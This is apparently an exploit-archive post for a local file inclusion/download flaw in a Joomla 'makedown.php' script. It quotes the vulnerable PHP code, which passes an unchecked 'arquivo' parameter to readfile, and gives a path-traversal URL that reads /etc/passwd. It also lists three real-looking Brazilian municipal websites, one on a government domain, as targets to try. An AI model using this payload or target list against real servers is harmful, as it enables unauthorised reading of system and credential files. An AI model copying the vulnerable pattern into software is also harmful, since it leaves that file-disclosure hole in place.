####
# Exploit Title: Joomla /Makedown.php Local File Inclusion/download
# Author: Th3 Bl4Ck H4Ck3R
# Facebook Page: http://www.fb.com/Mr.googl
# E-mail: X-_8@WindowsLive.CoM
# Category:: webapps
#############################################################################
[!~!] File makedown.php
------------------------------
==============================
header("Content-type: application/save");
//header("Content-Disposition: attachment; filename=$yourfile ");
header("Content-Disposition: attachment; filename=".$arquivo);
header('Expires: 0');
header('Pragma: no-cache');
readfile($arquivo);
------------------------------
[!~!] Exploit :
http://site.com/patch/makedown.php?arquivo=../../../../etc/passwd
[!~!] Exemple To Tested:
==================
# http://www.camaragravatal.com.br/projectos/
#
# http://www.camaradevereadores.com.br/arquivos/
#
# http://www.camaraurussanga.sc.gov.br/atas/
========================================================================================|
########################################################################################|
Gratez To :
|
My Teacher: Th3 M4RoC4in GhOsT
|
|
And All Friends:
Ba Lma3ti + Orikino + Mr.Adilo
########################################################################################|
========================================================================================|
